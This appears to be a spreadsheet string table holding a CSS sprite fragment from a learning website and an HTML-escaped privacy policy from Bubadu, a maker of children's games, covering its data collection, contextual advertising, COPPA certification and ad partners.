-83px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:122px;height:37px}.b-sprite-global-brilliant-logo-full-black{background-position:0px -122px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:133px;height:28px}.b-sprite-global-brilliant-logo{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:173.5px;height:42px}.b-sprite-global-chevron-right{background-position:-156px -44px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:27px}.b-sprite-global-close-black{background-position:-37px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:15px;height:15px}.b-sprite-global-close-blue{background-position:-54px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:15px;height:15px}.b-sprite-global-close-bold{background-position:-103px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:14px;height:14px}.b-sprite-global-close-white-large{background-position:-126px -44px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-global-close-white{background-position:-71px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:14px;height:15px}.b-sprite-global-facebook{background-position:-175.5px -124px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:19px;height:19px}.b-sprite-global-google-play{background-position:0px -44px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:124px;height:37px}.b-sprite-global-journal{background-position:-135px -122px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:24px;height:24px}.b-sprite-global-premium-banner-party-popper-mobile{background-position:-18px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:17px;height:17px}.b-sprite-global-premium-banner-party-popper{background-position:-175.5px -54px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:23px;height:23px}.b-sprite-global-premium-banner-star{background-position:-175.5px -79px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:22px;height:22px}.b-sprite-global-premium-banner-timer-mobile{background-position:-150px -83px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:17px;height:19px}.b-sprite-global-premium-banner-timer{background-position:-124px -83px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:24px;height:26px}.b-sprite-global-premium-banner-trophy-mobile{background-position:0px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:19px}.b-sprite-global-premium-banner-trophy{background-position:-175.5px -26px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:21px;height:26px}.b-sprite-global-rocket{background-position:-175.5px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:24px;height:24px}.b-sprite-global-search{background-position:-119px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:13.5px;height:13px}.b-sprite-global-twitter{background-position:-175.5px -103px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:23px;height:19px}[class*=b-sprite-homepage]{background-image:url(/site_media/version-V09acfcbba03/build/sprites-v2/homepage.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-homepage]{background-image:url(/site_media/version-V09acfcbba03/build/sprites-v2/homepage-x2.png);background-size:457px 339.5px}}.b-sprite-homepage-build-intuition-small{background-position:0px -262px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:75px;height:77.5px}.b-sprite-homepage-build-intuition{background-position:-154.5px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:125px;height:129.5px}.b-sprite-homepage-exploding-chest{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:152.5px;height:150px}.b-sprite-homepage-jumpingmanorbit{background-position:0px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:114px;height:108px}.b-sprite-homepage-master-small{background-position:-392px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:65px;height:80px}.b-sprite-homepage-master{background-position:-281.5px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:108.5px;height:134px}.b-sprite-homepage-solve-problems-small{background-position:-77px -262px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:72px;height:57px}.b-sprite-homepage-solve-problems{background-position:-116px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:119.5px;height:95px}.b-sprite-homepage-struggle-required-small{background-position:-151px -262px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:74px;height:52.5px}.b-sprite-homepage-struggle-required{background-position:-237.5px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:125px;height:88px}[class*=b-sprite-landing]{background-image:url(/site_media/version-V297f09f0643/build/sprites-v2/landing.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-landing]{background-image:url(/site_media/version-V297f09f0643/build/sprites-v2/landing-x2.png);background-size:198px 164.5px}}.b-sprite-landing-brilliant-logo-black-small{background-position:0px -65px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:132px;height:24px}.b-sprite-landing-brilliant-logo-black{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:168px;height:30.5px}.b-sprite-landing-brilliant-logo-white-small{background-position:0px -91px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:132px;height:24px}.b-sprite-landing-brilliant-logo-white{background-position:0px -32.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:168px;height:30.5px}.b-sprite-landing-chevron{background-position:-150px -117px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:12.5px;height:22px}.b-sprite-landing-facebook{background-position:-170px -118px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:22px;height:22px}.b-sprite-landing-icon-get-started-banner{background-position:-170px -90px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-landing-instagram{background-position:-134px -65px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:21.5px;height:21.5px}.b-sprite-landing-linkedin{background-position:-134px -91px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:21px;height:21px}.b-sprite-landing-path-college-science{background-position:0px -117px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-path-data-science-career{background-position:-30px -117px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-path-engineering-career{background-position:-60px -117px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-path-high-school-mathematics{background-position:-90px -117px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-path-logic-foundations{background-position:-120px -117px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-path-math-foundations{background-position:-170px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-path-probability-statistics-finance{background-position:-170px -30px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-path-software-development-career{background-position:-170px -60px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:28px;height:28px}.b-sprite-landing-twitter{background-position:0px -147px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:21px;height:17.5px}[class*=b-sprite-nux]{background-image:url(/site_media/version-Ve4785d8aa53/build/sprites-v2/nux.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-nux]{background-image:url(/site_media/version-Ve4785d8aa53/build/sprites-v2/nux-x2.png);background-size:604.5px 415px}}.b-sprite-nux-clipboard-person{background-position:-228px -251.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:90px;height:118px}.b-sprite-nux-earthandsatellite{background-position:-484px -183.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:84.5px;height:127px}.b-sprite-nux-interactive{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:275px;height:249.5px}.b-sprite-nux-kindled{background-position:-277px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:205px;height:186px}.b-sprite-nux-picasso{background-position:0px -251.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:226px;height:163.5px}.b-sprite-nux-yoda{background-position:-484px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:120.5px;height:181.5px}[class*=b-sprite-paywall]{background-image:url(/site_media/version-Vfecd7029e83/build/sprites-v2/paywall.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-paywall]{background-image:url(/site_media/version-Vfecd7029e83/build/sprites-v2/paywall-x2.png);background-size:965.5px 899.5px}}.b-sprite-paywall-bell{background-position:-905.5px -827.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:2</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
&lt;meta http-equiv="x-ua-compatible" content="ie=edge"&gt;
&lt;link rel="shortcut icon" href="../images/icons/favicon.ico"&gt;
&lt;title&gt;Bubadu Privacy Policy&lt;/title&gt;
&lt;meta name="description" content="Games and Entertaiment"&gt;
&lt;meta name="keywords" content="bubadu, pilcom, mobile, app, itunes, appstore, apple, google, play, amazon, store, download, free, android, ios, windows, microsoft, bubbu, duddu, family, pixie, builder game, supermarket game, doctor kids, baby care, bubbu school"&gt;
&lt;link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css"&gt;
&lt;link rel="stylesheet" href="../css /style.css?v=6"&gt; &lt;/head&gt;
&lt;body&gt;
&lt;header&gt;
&lt;div class="container-fluid"&gt;
&lt;div class="row"&gt;
&lt;div class="col-md-4"&gt;
&lt;a href="../"&gt;&lt;img src="../images/brand/logo.png" class="logo" alt=""&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;div class="col-md-8"&gt;
&lt;nav&gt;
&lt;ul&gt;
&lt;li class=""&gt;&lt;a href="..</t>
  </si>
  <si>
    <t>/games"&gt;GAMES&lt;/a&gt;&lt;/li&gt;
&lt;li class=""&gt;&lt;a href=".. /jobs"&gt;JOBS&lt;/a&gt;&lt;/li&gt;
&lt;li class=""&gt;&lt;a href="../contact-us"&gt;CONTACT US&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/nav&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/header&gt;
&lt;main&gt;
&lt;div class="simple-keyvisual blue"&gt;
&lt;h1&gt;Bubadu Privacy Policy&lt;/h1&gt;
&lt;/div&gt;
&lt;section class="text"&gt;
&lt;div class="container-fluid"&gt;
&lt;div class="row"&gt;
&lt;div class="col-md-8 offset-md-2"&gt;
&lt;h4&gt;I.ABOUT US&lt;br&gt;
If you have any privacy related concerns, please contact us at: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="0f7c7a7f7f607d7b4f6d7a6d6e6b7a216c606221"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Bubadu d.o.o is a company registered in Slovenia, with registration number 7117060000 and address at this date at Bračičeva ulica 21, 1380 Cerknica, Slovenia, EU (‘’Bubadu’’, ‘’We’’), who offers entertaining mobile applications (‘’App/s’’).</t>
  </si>
  <si>
    <t>This privacy statement describes how Bubadu collects and uses the information and/or data (the terms are used interchangeably) you provide. It also describes the choices available to you regarding our use of your information and your rights. We respect your privacy and we take protecting it seriously.&lt;/strong&gt;
&lt;br&gt;&lt;br&gt;
Should you have any data processing or privacy related questions, please contact our DPO, Primož Furlan by sending an email to: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="86f5f3f6f6e9f4f2c6e4f3e4e7e2f3a8e5e9eb"&gt;[email&amp;#160;protected]&lt;/a&gt; (subject 'DPO'').&lt;/p&gt;
&lt;h4&gt;II.</t>
  </si>
  <si>
    <t>HOW WE USE YOUR DATA&lt;/h4&gt;
&lt;p&gt; We process your data to offer our Services, for security reasons, for internal analytics and to show you advertisements.&lt;/p&gt;
&lt;h4&gt;TO OFFER OUR SERVICES&lt;/h4&gt;
&lt;p&gt; We process the data so that you can play the games, use in-app purchases, receive local notifications and use other functionalities with the app.</t>
  </si>
  <si>
    <t>We use it to maintain and analyse the functioning of the App, to respond to your questions as well as to comply with our legal obligations.&lt;/p&gt;
 &lt;h4&gt;FOR ADVERTISING&lt;/h4&gt;
&lt;p&gt;Bubadu apps are designed for families which is why we decided to set the ‘’do not track’ option for all users of our Android and iOS apps. This means that we do not collect advertising identifiers and we don’t pass it to our partners either.&lt;/p&gt;
&lt;p&gt;When using our apps, you will see ads that are based on the content of the app you are using (‘’contextual ads’’).</t>
  </si>
  <si>
    <t>We do not track our users, so we will never show you ads based on your behaviour or interest. We use your information for cross promoting our Apps and services, meaning to promote one of our apps while you are playing a different app of ours.&lt;/p&gt;
&lt;p&gt; In order to offer some of our Apps for free, we need to use the Information to display advertisements (banners, interstitials, rewarded videos) with the help of our Advertising Providers.</t>
  </si>
  <si>
    <t>The Apps include third parties’ SDK’s to collect the Information needed to display advertisements. The Information is used for ad serving features such as frequency capping (so that you are not displayed with the same ad twice etc.) and ad mediation. The Information may be stored on the user’s device through generally accepted industry technologies used within our apps (such as cookies, local storage).</t>
  </si>
  <si>
    <t>Our Advertising Providers may use cookies and other web-tracking technologies to collect non-personal information in case the user clicks on any of their advertisements.&lt;/p&gt;
&lt;p&gt; Our Advertising Providers are allowed to use the Information to provide contextual advertisements, conduct ad mediation, for support for internal operations and on an anonymized basis to improve their products by conducting research and analysis with the use of aggregated advertising information to understand and optimize how the advertisements are used.&lt;/p&gt;
&lt;p&gt;We select Advertising Providers attentively to maintain compliance with applicable privacy laws hence we only allow the display of contextual advertisements to Apps that are child directed or mixed audience. Furthermore, we flag users in child directed or mixed audience apps in order to ensure our Advertising Providers are able to comply with child protection legislation namely COPPA restrictions in the US territory, meaning they are allowed to use your information (if any) solely for the purposes of internal operations and contextual advertising but are prohibited from contacting a user, including through behavioural advertising; to amass a profile on a user; or use the Information for any other purpose.&lt;/p&gt;
&lt;h4&gt;FOR INTERNAL ANALYTICS&lt;/h4&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use the Information we collect with the help of our Analytics Providers to constantly improve our Apps and make them better for you. We and our Analytics Providers try to understand and optimise how our Apps are used, improve our marketing efforts, provide our content and features that are of interest to you, conduct statistics, analytics, research and development in order to continuously improve our apps and make them better for you. This includes correcting technical malfunctions, customization, providing better and improved content, developing new offers, measuring traffic and usage of our apps, promoting the apps and improving the user experience.</t>
  </si>
  <si>
    <t>We use aggregated and anonymized data log files and the activities of the user within our apps for internal analytics to improve our Apps.&lt;/p&gt;
&lt;p&gt; We also use your information to permit certain functionalities available within the apps (such as in-app purchases).&lt;/p&gt;
&lt;p&gt;We log basic events so that we can understand your actions within the app (gaming level reached, first opened the app, how many items you buy, in which currency etc.), we see system events or errors, we track metrics such as user engagement and behaviour per screen so that we can improve the App and make it more appealing, we can see how many users installed our app in a specific country etc.&lt;/p&gt;
&lt;p&gt; We chose our Providers carefully and request their compliance with valid legislation.</t>
  </si>
  <si>
    <t>For a full list of our third party service providers, please see Our Providers section.&lt;/p&gt;
&lt;h4&gt;FOR SAFETY AND SECURITY&lt;/h4&gt;
&lt;p&gt; We use your information for enhancing the safety and security of our Apps, products and services. We will use your IP address on third party web servers for security reasons to help us detect and prevent fraudulent activity.&lt;/p&gt;
&lt;h4&gt;LEGAL BASIS&lt;/h4&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use your data in a way you would reasonably expect, as our services are free and our data processing has minimal impact on your privacy. For these reasons we are relying on contractual basis and legitimate interests of contextual advertising and internal analytics as the legal basis for our data processing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Contract performance&lt;/strong&gt; This covers data that is processed by us in order to provide you with Services that you have requested.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Legitimate interests&lt;/strong&gt; This covers data processed by us for the purposes that can be reasonably expected within the context of your use of our Services to pursue our legitimate interests, in order to improve our Services and your experience, for advertising, for internal analytics and to ensure a safe and secure service.&lt;/p&gt;
&lt;h4&gt;III.</t>
  </si>
  <si>
    <t>THE DATA WE COLLECT&lt;/h4&gt;
&lt;h4&gt;TECHNICAL DATA&lt;/h4&gt;
&lt;p&gt;We and our Providers collect anonymous information by which users cannot be directly or indirectly identified. This may include various technical information, such as information about your device, your browser type, screen resolution, device type, language, version and type of operating system, mobile phone carrier, network provider, network status, SDK version, browser cookies, API key, application version, Android or iOS Vendor, location (specific enough to identify state and city and used for analytics and advertising), storage size, screen size, firmware, aggregated data log files from servers, session information, levels achieved and in-app purchases.&lt;/p&gt;
&lt;h4&gt;ADVERTISING DATA&lt;/h4&gt;
&lt;p&gt; We use the ‘’do not track’’ option for all our Apps which means that we do not collect advertising identifiers and do not pass it to the advertiser.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use our own identifier for advertising (‘’Bubadu Identifier’’), and we can’t connect it with any data that could personally identify you or your device. This means that the data is anonymous.&lt;/p&gt;
&lt;p&gt;Bubadu Identifier is a random string in a text file on your device. When sent to our server, it will be coded in a way that we will not be able to decode it.&lt;/p&gt;
&lt;p&gt;Advertisement response (including clicks on ads, if it originated a follow-up action to a third party e.g, “conversion” event), which advertisements are shown, the date and time a particular ad is served, angle view, information about the advertisements reviewed by the user.&lt;/p&gt;
&lt;p&gt;We collect and we allow our Providers to collect some of these information, such as: IP address, location data (specific enough to identify a state for cross promo ads and city for analytics), raw data log files on servers (IP address, date, time, requests, state etc.).</t>
  </si>
  <si>
    <t>Contextual advertising can come from the type of device being used, game/app genre, or selected language. Our Advertising Providers collect data regarding advertisement performance, user’s interaction with ads and our Apps.&lt;/p&gt;
&lt;p&gt; We use StoreKit Ad Network, or SKAdNetwork, a privacy-centric API operated by Apple.</t>
  </si>
  <si>
    <t>It helps ad networks and advertisers measure their ad activity (such as impressions, clicks, and app instals) on an aggregated level.&lt;/p&gt;
&lt;h4&gt;IP ADDRESS&lt;/h4&gt;
&lt;p&gt;We will collect your IP address on third party webservers for security reasons to help us detect and prevent fraudulent activity and to get country information needed for cross promo ads.&lt;/p&gt;
&lt;h4&gt;ANALYTICS IDENTIFIER&lt;/h4&gt;
&lt;p&gt;We use user_pseudo_id for analytics. This is a unique identifier based on app install. We can’t connect user_pseudo_id with any data that could personally identify you or your device.</t>
  </si>
  <si>
    <t xml:space="preserve">The data is anonymous and we use it on an aggregate basis meaning that we combine data from many users.&lt;/p&gt;
&lt;h4&gt;CHILDREN’S DATA&lt;/h4&gt;
&lt;p&gt;We pride ourselves on offering entertaining Apps for family audience of all ages. Because we want your child to use our Apps in a safe environment, we have limited the collection and usage of Information for all our Apps.&lt;/p&gt;
&lt;p&gt; We limit our Advertising Providers to show you only contextual ads and they are prohibited from conducting behavioural advertising, profiling or contacting you in any other way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;h4&gt;Kids Privacy Assured by PRIVO: COPPA Safe Harbor Certification&lt;/h4&gt;
&lt;p&gt;Bubadu d.o.o. is a member of the PRIVO Kids Privacy Assured COPPA Safe Harbor Certification Program (“the Program”).</t>
  </si>
  <si>
    <t>The Program certification applies to the digital properties listed on the validation page that is viewable by clicking on the PRIVO seal. PRIVO is an independent, third-party organization committed to safeguarding children's information collected online. The PRIVO COPPA certification seal posted on this page indicates Bubadu d.o.o. has established COPPA compliant privacy practices and has agreed to submit to PRIVO’s oversight and consumer dispute resolution process.</t>
  </si>
  <si>
    <t>If you have questions or concerns about our privacy practices, please contact us at +386 1 7096 060 or &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="98e8eaf1eef9fbe1d8faedfaf9fcedb6fbf7f5b6"&gt;[email&amp;#160;protected]&lt;/a&gt; If you have further concerns after you have contacted us, you can contact PRIVO directly at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="502022392631332910202239263f7e333f3d7e"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
&lt;a href="https://cert.privo.com/#/companies/bubadu" target="_blank"&gt;
&lt;img src="https://privohub.privo.com/files/images/certSeal2018/COPPA.png" alt="COPPA Safe Harbor Certification" title="COPPA Safe Harbor Certification" width="140" height="70"&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h4&gt;IV. WHO HAS ACCESS TO YOUR DATA&lt;/h4&gt;
&lt;p&gt;We cannot provide all services necessary for the successful operation of our Apps by ourselves. We therefore enable our Providers to collect some information from you.</t>
  </si>
  <si>
    <t>When using the Third Party Services, you adhere to their data processing practices, as defined in their Privacy Policies available below. We encourage you to read the Privacy Policies before using such services. We strive to obligate our Advertising and Analytics Providers to comply with this Privacy Policy, but we cannot provide any guarantee on their behalf.</t>
  </si>
  <si>
    <t>We have entered into Data Processing Agreements with our Providers to make sure your data is safe.&lt;/p&gt;
&lt;p&gt;We adhere to the generally accepted industry practices regarding the collection and the usage of information by our Providers and strive to limit their usage to the services they provide for us. You recognize and agree that Bubadu is not liable for the Third Party Service Provider’s terms and conditions and their use of your Information. If you for example click on the ad within our App and get redirected to third party site, your data processing will be governed by such third party provider’s terms and privacy policy.</t>
  </si>
  <si>
    <t xml:space="preserve">For more information on the Provider’s Information processing practices, please read their privacy policies.&lt;/p&gt;
&lt;h4&gt;THIRD PARTY SERVICE PROVIDERS&lt;/h4&gt;
&lt;p&gt;By voluntarily signing into Third Party Providers functionalities within our App, you allow the usage of your data to such third parties.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Google Wallet&lt;/strong&gt; If you choose to use Google Checkout to finalize and pay for your order, you will provide your credit card number directly to Google Checkout. Google's Privacy Policy will apply to the information you provide to the Google Checkout web site.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br&gt;
&lt;a href="https://payments.google.com/payments/apis-secure/u/0/get_legal_document?ldo=0&amp;ldt=buyertos&amp;ldr=US"&gt;https://payments.google.com/payments/apis-secure/u/0/get_legal_document?ldo=0&amp;ldt=buyertos&amp;ldr=US&lt;br&gt;&lt;/a&gt;
&lt;a href="https://payments.google.com/payments/apis- secure/u/0/get_legal_document?ldo=0&amp;ldt=privacynotice"&gt;https://payments.google.com/payments/apis- secure/u/0/get_legal_document?ldo=0&amp;ldt=privacynotice&lt;br&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apple AppStore&lt;/strong&gt; If you choose to use AppStore to finalize and pay for your order, you will provide your credit card number directly to Apple. Apple's Privacy Policy will apply to the information you provide to Apple.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br&gt;
&lt;a href="http://www.apple.com/legal/internet-services/itunes/us/terms.html"&gt;http://www.apple.com/legal/internet-services/itunes/us/terms.html&lt;br&gt;&lt;/a&gt;
&lt;a href="http://www.apple.com/legal/privacy/"&gt;http://www.apple.com/legal/privacy/&lt;br&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Amazon&lt;/strong&gt; If you choose to use Amazon to finalize and pay for your order, you will provide your credit card number directly to Amazon. Amazon's Privacy Policy will apply to the information you provide to Amazon.
</t>
  </si>
  <si>
    <t>&lt;br&gt;
&lt;a href="https://payments.amazon.com/help/201212430"&gt;https://payments.amazon.com/help/201212430&lt;br&gt;&lt;/a&gt;
&lt;a href="https://payments.amazon.com/help/201751600"&gt;https://payments.amazon.com/help/201751600&lt;br&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Huawei App Gallery&lt;/strong&gt; If you choose to use Huawei App Gallery
&lt;br&gt;
&lt;a href="link"&gt;https://privacy.consumer.huawei.com/legal/hiapp/terms.htm?country=DE&amp;branchid=1&amp;language=sl&lt;br&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In-App purchases&lt;/strong&gt; Our Apps have in-app purchases.</t>
  </si>
  <si>
    <t>In order to make a purchase from us, you must use our third party checkout options to finalize and pay for your order. In-app purchases may be made only upon entering the app store password and you are responsible for maintaining the security of such password. Your authentication and security maintaining is subject to specific terms of the app store and the OS of your mobile device.</t>
  </si>
  <si>
    <t>You should be aware of the iOS’ 15-minute and Android’s 30-minute window after the downloading of an Application, during which in-app purchases may be made without inserting an in-app store password.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third Party Sites&lt;/strong&gt; Our Apps may contain links to third party websites, products, or services. For example, the Apps may feature offers from third party advertisers or the ability to engage in transactions with such entities.</t>
  </si>
  <si>
    <t>Please note that while using such third party offerings, you are using sites, products, and services developed and administered by people or companies not affiliated with or controlled by us. We are not responsible for the actions of those people or companies, the content of their sites, products or services, the use of information you provide to them, or any products or services they may offer. Our link to such third parties does not constitute our sponsorship of, or affiliation with, those people or companies.</t>
  </si>
  <si>
    <t>Nor is such linking an endorsement of such third party’s privacy or information security policies or practices or their compliance with laws. Information collected by third parties, which may include such things as location information or contact details, is governed by their privacy practices. These other websites or services may place their own cookies or other files on your computing device, collect information or solicit personal information from you.</t>
  </si>
  <si>
    <t>We encourage you to learn about the privacy practices of third parties with which you interact. We are not responsible or liable for your interaction with such third parties, the information requests initiated by such third parties, or the subsequent use, treatment or dissemination of information you voluntarily choose to provide to them.&lt;/p&gt;
&lt;h4&gt;ADVERTISING PROVIDERS&lt;/h4&gt;
&lt;p&gt;We show ads with COPPA settings for the US territory enabled, meaning that the Advertising Providers are obligated to comply with COPPA restrictions as stated herein. Some of the Advertising Providers store or transfer data outside EEA.</t>
  </si>
  <si>
    <t>The data is transferred to countries with a current determination of adequacy, adhering to Binding Corporate Rules, EU-US Privacy Shield or other acceptable manners.&lt;/p&gt;
&lt;p&gt;We show third party advertisements from these ad partners
&lt;br&gt;
Kidoz: &lt;a href="https://kidoz.net/website-and-kidoz-sdk-privacy-policy"&gt;https://kidoz.net/website-and-kidoz-sdk-privacy-policy&lt;/a&gt;&lt;br&gt;
AdMob: &lt;a href="https://policies.google.com/privacy"&gt;https://policies.google.com/privacy&lt;/a&gt;&lt;br&gt;
&lt;a href="https://support.google.com/admob/answer/6128543?hl=en"&gt;https://support.google.com/admob/answer/6128543?hl=en&lt;/a&gt;&lt;br&gt;
Unity Ads: &lt;a href="https://unity3d.com/legal/privacy-policy"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;br&gt;
AppLovin: &lt;a href="https://www.applovin.com/privacy"&gt;https://www.applovin.com/privacy&lt;/a&gt;&lt;br&gt;
Vungle: &lt;a href="https://vungle.com/privacy"&gt;https://vungle.com/privacy&lt;/a&gt;&lt;br&gt;
inMobi: &lt;a href="https://www.inmobi.com/privacy-policy"&gt;https://www.inmobi.com/privacy-policy&lt;/a&gt;&lt;br&gt;
IronSource: &lt;a href="https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy"&gt;https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy&lt;/a&gt;&lt;br&gt;
Huawei Prime ads: We have integrated the HUAWEI Ads SDK (com.huawei.hms:ads-prime) into your app. &lt;a href="https://developer.huawei.com/consumer/en/doc/development/HMSCore-Guides/publisher-service-personal-data-0000001050066921"&gt;https://developer.huawei.com/consumer/en/doc/development/HMSCore-Guides/publisher-service-personal-data-0000001050066921&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SuperAwesome:</t>
  </si>
  <si>
    <t>SuperAwesome Trading Limited (“SuperAwesome”) is a provider of kid-safe advertising services that are designed specifically for the compliance requirements of younger audiences, including those aged under 13. SuperAwesome places contextual advertising on applications without collecting any personally identifiable information, including persistent identifiers.&lt;/p&gt;
&lt;p&gt; SuperAwesome is certified as COPPA-compliant by the kidSAFE Seal Program, an FTC-Approved COPPA Safe Harbor Program.</t>
  </si>
  <si>
    <t>Please go to www.kidsafeseal.com for more information.&lt;/p&gt;
&lt;p&gt; SuperAwesome is a valid licensee, and participating member, of the Entertainment Software Rating Board’s Privacy Certified Program (“ESRB Privacy Certified”). To protect your privacy, SuperAwesome has voluntarily undertaken this privacy initiative, and its services have been reviewed and certified by ESRB Privacy Certified to meet established online information collection, use and disclosure practices.</t>
  </si>
  <si>
    <t>As a licensee of this privacy program, SuperAwesome’s services are subject to frequent audits and other enforcement and accountability mechanisms administered independently by ESRB Privacy Certified.&lt;/p&gt;
&lt;p&gt;SuperAwesome also provides advertising services in compliance with the General Data Protection Regulation (EU 1996/679). Adopting an approach of ‘privacy by design and by default’, SuperAwesome utilises proprietary technologies so that it neither collects, stores nor shares your personal data to provision advertisements or target advertising to you.&lt;/p&gt;
